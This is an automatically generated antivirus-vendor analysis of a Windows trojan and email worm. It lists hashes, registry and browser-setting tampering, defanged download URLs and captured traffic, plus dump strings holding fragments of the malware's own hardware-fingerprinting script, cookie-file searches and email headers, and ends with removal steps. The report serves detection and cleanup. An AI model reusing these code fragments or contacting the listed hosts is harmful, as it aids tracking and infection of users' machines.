Gen.Variant.Graftor.126227_6083fc7b92

by malwarelabrobot on September 9th, 2014 in Malware Descriptions.

Gen:Variant.Graftor.126227 (B) (Emsisoft), Gen:Variant.Graftor.126227 (AdAware), Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, EmailWorm


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 6083fc7b926c2e4280f1bec9c955c8c5
SHA1: a664dc98ddf9ede7dd41a5135b4456bf9373a449
SHA256: 96b778f2f2288d64e818e66dd0339f24bc4dc72b6f37c8a9ade2ab8b82e47e3a
SSDeep: 12288:6jnhq27KLPw5cM77yM8qckHcrQoZaNWXb5xYh/33GNN3NN7fp:6hZKjw5cq JbRrLZaNWXbN
Size: 618496 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: ASPackv212, UPolyXv05_v6
Company: AirInstaller
Created at: 2013-10-14 09:16:01
Analyzed on: WindowsXPESX SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour Description
EmailWorm Worm can send e-mails.


Process activity

The Trojan creates the following process(es):

%original file name%.exe:384

The Trojan injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:384 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\oem_te.tmp (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\temp_oem_1.tmp (383 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\temp_oem_1.tmp.tmp (383 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\temp_oem_1.tmp.tmp (0 bytes)

Registry activity

The process %original file name%.exe:384 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\baidu\Hao123\hao123desk]
"NewBaiduTn" = "tn=43059038_2_hao_pg"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\baidu\bdbrowserdesk\hao123]
"BaiduTn" = "tn=43059038_2_hao_pg"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\baidu\Hao123\hao123desk]
"TnFromIEHomePage" = "tn=43059038_2_hao_pg"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "09 D8 CC 36 9E 9B 3F E4 CE E2 DF F8 46 03 3B 24"

[HKCU\Software\baidu\Hao123\hao123desk]
"IEHomePage" = "http://www.hao123.com/?tn=43059038_2_hao_pg"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: ?????
Product Name: ?????
Product Version: 2.0.2.6
Legal Copyright: ????,????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.0.2.6
File Description: ?????
Comments: ?????
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 827392 279552 5.54458 9bcc217d8a81cc8bb21eee54e626cccc
.rdata 831488 315392 204800 5.54398 c70a44bc1602a54b7a44a1f1121f1c90
.data 1146880 176128 17920 5.52636 0e2fafc88355e6eea92102da482cd4d3
.rsrc 1323008 122880 8192 4.56693 068aa97771bee1b069b8e4d0868af43f
.aspack 1445888 106496 106496 3.73933 e8999329422d54f4ca8c1c5f34d94ce2
.adata 1552384 4096 0 0 d41d8cd98f00b204e9800998ecf8427e

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://mac.866dy.com/down/setup_s_14.asp?v=2.6&pid=6083fc7b926c2e4280f1bec9c955c8c5 103.24.1.103
hxxp://www.lzgzs.com/setup-866.asp?v=2.6&pid=6083fc7b926c2e4280f1bec9c955c8c5 118.99.19.122
hxxp://mac.866dy.com/down/360-down.asp 103.24.1.103
hxxp://192.151.224.42/
hxxp://www.866dy.com/down/360-down.asp 103.24.1.103


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Windows NT Version 5.0

Traffic

GET / HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.0; MyIE2; .NET CLR 1.1.4322)
Range: bytes=0-
Connection: Keep-Alive
Cache-Control: no-cache
Host: 192.151.224.42


HTTP/1.1 206 Partial Content
Date: Mon, 08 Sep 2014 12:35:11 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 27 Jan 2014 06:16:30 GMT
ETag: "7839a-17f



GET /down/360-down.asp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.0; MyIE2; .NET CLR 1.1.4322)
Range: bytes=0-
Host: VVV.866dy.com
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Location: hXXp://192.151.224.42
Content-Type: text/html; charset=iso-8859-1
Content-length: 229
Cache-Control: no-cache
Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>301 Moved Permanently</title>.</head
><body>.<h1>Moved Permanently</h1>.<p>The d
ocument has moved <a href="hXXp://192.151.224.42">here</a>
.</p>.</body></html>...



GET /setup-866.asp?v=2.6&pid=6083fc7b926c2e4280f1bec9c955c8c5 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.lzgzs.com
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Content-Length: 1308
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 08 Sep 2014 12:44:49 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.or
g/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>.....
.......</TITLE>..<META HTTP-EQUIV="Content-Type" Content="tex
t/html; charset=GB2312">..<STYLE type="text/css">..  BODY { f
ont: 9pt/12pt .... }..  H1 { font: 12pt/15pt .... }..  H2 { font: 9pt/
12pt .... }..  A:link { color: red }..  A:visited { color: maroon }..&
lt;/STYLE>..</HEAD><BODY><TABLE width=500 border=0 c
ellspacing=10><TR><TD>..<h1>............</h1&g
t;....................................................<hr>..<
p>................</p>..<ul>..<li>...............
.........................................</li>..<li>......
......................................................................
......</li>..<li>....<a href="javascript:history.back(1
)">....</a>....................</li>..</ul>..<
h2>HTTP .... 404 - ..................<br>Internet ........ (I
IS)</h2>..<hr>..<p>..............................<
;/p>..<ul>..<li>.... <a href="hXXp://go.microsoft.co
m/fwlink/?linkid=8180">Microsoft ............</a>..........&l
dquo;HTTP”..“404”........</li>..<li>....
“IIS ....”...... IIS ...... (inetmgr) ....................
....“........”..“............”..“.......
...........”........</li>..</ul>..</TD><
<<< skipped >>>


GET /down/setup_s_14.asp?v=2.6&pid=6083fc7b926c2e4280f1bec9c955c8c5 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: mac.866dy.com
Connection: Keep-Alive


HTTP/1.1 301 Moved Permanently
Location: hXXp://192.151.224.42
Content-Type: text/html; charset=iso-8859-1
Content-length: 229
Cache-Control: no-cache
Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>301 Moved Permanently</title>.</head
><body>.<h1>Moved Permanently</h1>.<p>The d
ocument has moved <a href="hXXp://192.151.224.42">here</a>
.</p>.</body></html>...







The Trojan connects to the servers at the folowing location(s):







%original file name%.exe_384:




.text
.rdata
.data
.rsrc
.aspack
.adata
t%SVh
t$(SSh
|$D.tm
~%UVW
u$SShe
ole32.dll
kernel32.dll
user32.dll
User32.dll
gdiplus.dll
GdiPlus.dll
Kernel32.dll
advapi32.dll
shell32.dll
gdi32.dll
msimg32.dll
Ole32.dll
Gdi32.dll
Gdiplus.dll
UxTheme.dll
ShellExecuteA
GetProcessHeap
ShellExecuteEx
MsgWaitForMultipleObjects
SetWindowsHookExA
UnhookWindowsHookEx
GetKeyState
RegCreateKeyA
RegOpenKeyA
RegCloseKey
RegFlushKey
RegDeleteKeyA
RegEnumKeyA
RegSaveKeyA
RegRestoreKeyA
RegNotifyChangeKeyValue
GdipSetStringFormatHotkeyPrefix
\temp_oem_1.tmp
\main.exe
\unstall.ini
\date.dat
\unstall.exe
%dSUU
.eRp(L
.eOZZ
\unstall.dat
play_bst.exe
@.lnk
WScript.Shell
HotKey
WindowStyle
.Xr."
1*%Skv
k*.ls
%fWJF
)jH.Rq
~iC.xJn
^@Ex_DirectUI_MsgBox
msg_wnd
09/27/12
hXXp://
Microsoft.XMLHTTP
application/x-www-form-urlencoded
WINLOGON.EXE
10/05/12
\.YVV
Ï[H
L <
unstall.exe
open.exe
n.lMdw
.okJ^
PF.Nk)
%D$lh
c%xltbZ"
.DLDD
cl%d)
8p,Wg3E?
oem_te.tmp
.VRb,
hXXp://VVV.hao123.com/?tn=43059038_2_hao_pg
rundll32.exe url.dll,FileProtocolHandler
C:\Windows\System32\Drivers\etc\hostshXXp://VVV.super-ec.cnhXXp://wghai.com/echXXp://qsyou.com/echXXp://VVV.wghai.comhXXp://bbs.wghai.com/forum-17-1.html/forum-12-1.html/memcp.php/ip.asp/time.asp/gonggao.txt/ec-user6.php/ec-bd.php/ec-jh.php
hXXp://VVV.super-ec.cn
<input type="text" name="field_2new" size="25" value="" disabled class="txt" />" class="txt" />Function Getcpuid()
Set cpuSet = GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_Processor")
getcpuid=cpu.ProcessorId
{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}
(@wininet.dll
User-Agent: Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.0; MyIE2; .NET CLR 1.1.4322)
InternetOpenUrlA
HttpQueryInfoA
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
http=
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Content-Type: application/x-www-form-urlencoded
HttpOpenRequestA
HttpSendRequestA
HttpAddRequestHeadersA
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cookies
\*.txt
scripting.FileSystemObject
%Documents and Settings%\IBM\Cookies\*.txt
Content.IE5\
=MSScriptControl.ScriptControl
for(var i=0;i<hexstr.length;i  ){
A=hexstr.substr(i,1).toUpperCase();
arr[arr.length]=A;
for(var i=0;i<arr.length;i  ){
var len=arr.length-i-1;
zero =parseInt(arr[i])*Math.pow(16,len);
var B=Math.max(num);var Y;var S=B;var sarr=[];var yarr=[];
yarr[yarr.length]=Y;
return S yarr.reverse().join('');
A=hexstr.toUpperCase();
arr[arr.length]='\\u' D2H(hexstr.charCodeAt(i));
return arr.join('');
Set WMI =GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_BIOS")
GetTrait =Obj.Name&chr(13)&chr(10)&Obj.Manufacturer&chr(13)&chr(10)&Obj.InstallDate&chr(13)&chr(10)&Obj.Caption&chr(13)&chr(10)&Obj.SerialNumber&chr(13)&chr(10)&Obj.SMBIOSBIOSVersion&chr(13)&chr(10) &"
BIOS:"&Obj.PrimaryBIOS
Set WMI =GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_DiskDrive")
GetTrait =GetTrait&Obj.Model&chr(13)&chr(10)&Obj.MediaType&chr(13)&chr(10)&Obj.Manufacturer &chr(13)&chr(10)&Obj.Description &chr(13)&chr(10)&Obj.TotalCylinders &chr(13)&chr(10)&Obj.TotalHeads&chr(13)&chr(10)&Obj.SectorsPerTrack&chr(13)&chr(10)&Obj.Size&chr(13)&chr(10)&chr(13)&chr(10)
\\.\PhysicalDrive
Set WMI =GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_PhysicalMedia")
GetTrait =GetTrait&Obj.SerialNumber&chr(13)&chr(10)
Set WMI =GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_Processor")
GetTrait = GetTrait&Obj.ProcessorId&chr(13)&chr(10)&Obj.name&chr(13)&chr(10)&Obj.Caption&chr(13)&chr(10)&Obj.CreationClassName&chr(13)&chr(10)&Obj.CurrentVoltage&chr(13)&chr(10)&Obj.DataWidth&chr(13)&chr(10)&Obj.Description&chr(13)&chr(10)&chr(13)&chr(10)
Set WMI =GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_SoundDevice")
GetTrait =GetTrait&Obj.Caption &chr(13)&chr(10)&Obj.Description &chr(13)&chr(10)&Obj.Name &chr(13)&chr(10)&Obj.Manufacturer&chr(13)&chr(10)&chr(13)&chr(10)
Set WMI =GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_VideoController")
GetTrait =GetTrait&Obj.Caption&chr(13)&chr(10)&Obj.VideoArchitecture&chr(13)&chr(10)&Obj.VideoMemoryType&chr(13)&chr(10)&round(Obj.AdapterRAM/1024/1024,0)&chr(13)&chr(10)&Obj.Description &chr(13)&chr(10)&Obj.MaxRefreshRate &chr(13)&chr(10)&Obj.MinRefreshRate &chr(13)&chr(10)&Obj.AdapterDACType &chr(13)&chr(10)&Obj.VideoProcessor&chr(13)&chr(10)&Obj.CurrentHorizontalResolution &"
"&Obj.CurrentVerticalResolution&chr(13)&chr(10)&Obj.CurrentBitsPerPixel&chr(13)&chr(10)&chr(13)&chr(10)
Set WMI =GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_ComputerSystem")
GetTrait = Obj.Name
Set WMI =GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_OperatingSystem")
GetTrait =Obj.Name &chr(13)&chr(10)&Obj.OSType &chr(13)&chr(10)&Obj.CodeSet&chr(13)&chr(10)&Obj.InstallDate &chr(13)&chr(10)&Obj.SizeStoredInPagingFiles &chr(13)&chr(10)&Obj.Caption &chr(13)&chr(10)&round(Obj.TotalVisibleMemorySize/1024,0)
Set WMI =GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_baseboard")
GetTrait = Obj.Caption&chr(13)&chr(10)&Obj.CreationClassName&chr(13)&chr(10)&Obj.Description&chr(13)&chr(10)&Obj.Manufacturer&chr(13)&chr(10)&Obj.product&chr(13)&chr(10)&Obj.SerialNumber&chr(13)&chr(10)&Obj.Tag&chr(13)&chr(10)&Obj.Version&chr(13)&chr(10)&Obj.Name
Set WMI =GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_CDROMDrive")
GetTrait = GetTrait&Obj.Drive&chr(13)&chr(10)&Obj.Manufacturer&chr(13)&chr(10)&Obj.Description &chr(13)&chr(10)&Obj.Caption&chr(13)&chr(10)&chr(13)&chr(10)
Set WMI =GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_CacheMemory")
GetTrait = GetTrait&Obj.Level&chr(13)&chr(10)&Obj.WritePolicy&chr(13)&chr(10)&Obj.ErrorCorrectType &chr(13)&chr(10)&Obj.CacheType&chr(13)&chr(10)&Obj.Associativity &chr(13)&chr(10)&Obj.ReplacementPolicy&chr(13)&chr(10)&chr(13)&chr(10)
Set WMI =GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_SystemSlot")
GetTrait = Obj.SlotDesignation&chr(13)&chr(10)&Obj.MaxDataWidth
Set WMI =GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_NetworkAdapterConfiguration")
If Obj.IPEnabled=True Then
GetTrait = GetTrait&Obj.Caption&chr(13)&chr(10)&Obj.DatabasePath&chr(13)&chr(10)&Obj.Description&chr(13)&chr(10)&Obj.DHCPLeaseObtained&chr(13)&chr(10)&Obj.DHCPServer&chr(13)&chr(10)&Obj.DNSHostName&chr(13)&chr(10)&Obj.MacAddress&chr(13)&chr(10)&Obj.ServiceName&chr(13)&chr(10)&Obj.SettingID&chr(13)&chr(10)&chr(13)&chr(10)
Set WMI =GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_LogicalMemoryConfiguration")
GetTrait = Obj.TotalPhysicalMemory
Set WMI =GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_PhysicalMemory")
GetTrait = GetTrait&Obj.BankLabel&chr(13)&chr(10)&Obj.Capacity&chr(13)&chr(10)&Obj.Caption&chr(13)&chr(10)&Obj.CreationClassName&chr(13)&chr(10)&Obj.DataWidth&chr(13)&chr(10)&Obj.Description&chr(13)&chr(10)&Obj.DeviceLocator&chr(13)&chr(10)&Obj.Manufacturer&chr(13)&chr(10)&Obj.Name&chr(13)&chr(10)&Obj.PartNumber&chr(13)&chr(10)&Obj.SerialNumber&chr(13)&chr(10)&Obj.Speed&chr(13)&chr(10)&Obj.Tag&chr(13)&chr(10)&Obj.TotalWidth &chr(13)&chr(10)&Obj.TypeDetail&chr(13)&chr(10)&chr(13)&chr(10)
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
RASAPI32.dll
WinExec
KERNEL32.dll
USER32.dll
GetViewportOrgEx
GDI32.dll
WINMM.dll
WINSPOOL.DRV
RegOpenKeyExA
ADVAPI32.dll
SHELL32.dll
OLEAUT32.dll
COMCTL32.dll
WS2_32.dll
InternetCrackUrlA
InternetCanonicalizeUrlA
WININET.dll
GetCPInfo
CreateDialogIndirectParamA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
RegCreateKeyExA
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
1.1.3
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
926c2e4280f1bec9c955c8c5.exe
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
rasapi32.dll
winmm.dll
winspool.drv
oleaut32.dll
comctl32.dll
ws2_32.dll
wininet.dll
(*.*)
2.0.2.6






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    %original file name%.exe:384
    

    2. 

  2. Delete the original Trojan file.
    3. 

  3. Delete or disinfect the following files created/modified by the Trojan:
    

    %Documents and Settings%\%current user%\Local Settings\Temp\oem_te.tmp (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\temp_oem_1.tmp (383 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\temp_oem_1.tmp.tmp (383 bytes)
    

    4. 

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    5. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2026 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now